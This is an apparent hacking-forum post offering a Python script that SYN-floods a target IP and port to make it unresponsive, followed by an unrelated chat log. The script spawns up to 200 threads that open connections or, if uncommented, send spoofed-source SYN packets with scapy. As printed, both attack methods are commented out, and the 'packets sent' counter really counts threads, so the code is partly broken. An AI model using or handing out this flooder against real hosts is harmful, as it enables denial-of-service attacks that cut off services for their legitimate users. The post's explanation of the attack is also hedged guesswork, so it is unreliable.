• Hello Guest! Welcome to ConsoleCrunch, to help support our site check out the premium upgrades HERE! to get exclusive access to our hidden content.
  • Unable to load portions of the website...
    If you use an ad blocker addon, you should disable it because it interferes with several elements of the site and blocks more than just adverts.
  • Read Rules Before Posting Post Virus Scans with every program.

SynFlood Dos [Python]

ZionHD

Leader
Retired Staff
This script uses multiple threads to flood your target using the Syn/ACK 3 way handshake attack. This drops connections once it finishes the second step, I believe correct me if I'm wrong. This will make the target wait for a packet that will never come and cause it to be unresponsive. The reason it crashes or becomes unresponsive is because the server is consuming a lot of resources by waiting for a packet that will never come plus your flooding it repeatedly causing multiple connections to be opened. This is what I believe. This script is coded in python so it should end with .py if you save it on your pc or server.

Wiki's Definition of SynFlood:
A SYN flood is a form of denial-of-service attack in which an attacker sends a succession of SYN requests to a target's system in an attempt to consume enough server resources to make the system unresponsive to legitimate traffic.

Code:
#!/usr/bin/env python
#########################################
# 
# SYNflood.py - A multithreaded SYN Flooder
# By Brandon Smith
# brandon.smith@studiobebop.net
#
# This script is a demonstration of a SYN/ACK 3 Way Handshake Attack 
# as discussed by Halla of Information Leak
#
#########################################
import socket
import random
import sys
import threading
#import scapy # Uncomment this if you're planning to use Scapy

###
# Global Config
###

interface    = None
target       = None
port         = None
thread_limit = 200
total        = 0

#!# End Global Config #!#

class sendSYN(threading.Thread):
    global target, port
    def __init__(self):
        threading.Thread.__init__(self)

    def run(self):
        # There are two different ways you can go about pulling this off.
        # You can either:
        #   - 1. Just open a socket to your target on any old port
        #   - 2. Or you can be a cool kid and use scapy to make it look cool, and overcomplicated!
        #
        # (Uncomment whichever method you'd like to use)

        # Method 1 -
#        s = socket.socket()
#        s.connect((target,port))

        # Methods 2 -
#        i = scapy.IP()
#        i.src = "%i.%i.%i.%i" % (random.randint(1,254),random.randint(1,254),random.randint(1,254),random.randint(1,254))
#        i.dst = target

#        t = scapy.TCP()
#        t.sport = random.randint(1,65535)
#        t.dport = port
#        t.flags = 'S'

#        scapy.send(i/t, verbose=0)

if __name__ == "__main__":
    # Make sure we have all the arguments we need
    if len(sys.argv) != 4:
        print "Usage: %s <Interface> <Target IP> <Port>" % sys.argv[0]
        exit()

    # Prepare our variables
    interface        = sys.argv[1]
    target           = sys.argv[2]
    port             = int(sys.argv[3])
#    scapy.conf.iface = interface # Uncomment this if you're going to use Scapy

    # Hop to it!
    print "Flooding %s:%i with SYN packets." % (target, port)
    while True:
        if threading.activeCount() < thread_limit: 
            sendSYN().start()
            total += 1
            sys.stdout.write("\rTotal packets sent:\t\t\t%i" % total)
 
General chit-chat
Help Users
  • No one is chatting at the moment.
  • @ ShutTheCrunchUp:
    God damn nos
  • @ ShutTheCrunchUp:
    Nostalgia
  • @ ShutTheCrunchUp:
    Miss the good ol days
  • @ QM|T_JinX:
    hey bro how you
  • @ QM|T_JinX:
    yea me too for sure
  • @ ShutTheCrunchUp:
    Doing alright bro. Haven't been on here in years
  • @ QM|T_JinX:
    yea i know havent seen you in a long time welcome back tho hahah
  • @ ShutTheCrunchUp:
    Bro life been fucked up since 2016
  • @ QM|T_JinX:
    lol thats a long fucked up life then hhaha
  • @ QM|T_JinX:
    but you right men for sure back then it was way better on here
  • Chat Bot:
    mazeek101 is our newest member. Welcome!
  • @ QM|T_JinX:
    well its like 4 in the morning down here im gonna try to get some shut eye night bro
  • Chat Bot:
    QM|T_JinX has joined the room.
  • Chat Bot:
    QM|T_JinX has joined the room.
  • Chat Bot:
    Dnank is our newest member. Welcome!
  • Chat Bot:
    QM|T_JinX has joined the room.
  • Chat Bot:
    QM|T_JinX has joined the room.
  • Chat Bot:
    CutterSpaulding is our newest member. Welcome!
  • Chat Bot:
    CutterSpaulding has posted a new profile post.
  • Chat Bot:
    lpllll___ is our newest member. Welcome!
  • Chat Bot:
    QM|T_JinX has joined the room.
  • Chat Bot:
    Christo has joined the room.
  • Chat Bot:
    QM|T_JinX has joined the room.
  • Chat Bot:
    QM|T_JinX has joined the room.
  • Chat Bot:
    Macbook is our newest member. Welcome!
      Chat Bot: Macbook is our newest member. Welcome!
      Back
      Top